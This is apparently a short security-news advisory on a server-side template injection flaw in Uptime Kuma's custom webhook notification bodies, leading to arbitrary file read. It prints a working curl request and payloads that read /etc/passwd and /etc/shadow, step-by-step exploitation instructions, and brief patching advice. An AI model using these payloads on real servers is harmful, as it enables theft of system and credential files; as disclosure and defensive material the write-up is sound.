Listen to this Post
How the mentioned CVE works:
The vulnerability exists in the notification system, specifically for Webhook and Telegram types. When a user sets a notification to use a ‘custom’ request body, the `send()` function passes the user-supplied content directly to the `renderTemplate()` function without sanitization. This function instantiates the Liquid.js template engine and parses the input. Since the Liquid engine is not properly sandboxed or restricted, an attacker can inject template tags like {% render '/etc/passwd' %}. During template rendering, the engine processes this tag, interpreting it as a directive to read and include the contents of the specified server-side file, leading to arbitrary file disclosure through Server-Side Template Injection.
Platform: Uptime Kuma
Version: <= 1.23.x
Vulnerability : SSTI
Severity: Critical
date: 2024-10-XX
Prediction: 2024-11-15
What Undercode Say:
curl -X POST http://kuma-server/api/notification/test/1 -H "Content-Type: application/json" -d '{"webhookContentType": "custom", "webhookCustomBody": "{\"\": {% render '\''/etc/passwd'\'' %} }" }'
// Exploit payload for custom webhook body
{
"data": "{% render '/etc/shadow' %}"
}
How Exploit:
1. Authenticate to Uptime Kuma.
2. Navigate to Notifications.
3. Create/Edit a Webhook notification.
4. Set ‘Request Body’ to ‘Custom Body’.
- Insert SSTI payload:
{"": {% render '/etc/passwd' %}}.
6. Trigger a test notification.
- Observe file contents in the webhook response or server logs.
Protection from this CVE:
Sanitize user input in `renderTemplate`.
Implement a sandbox for Liquid.js.
Use a strict whitelist for allowed template operations.
Apply the official patch.
Impact:
Arbitrary File Read
Sensitive Data Leakage
Post-Authentication Exploit
Server Information Disclosure
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
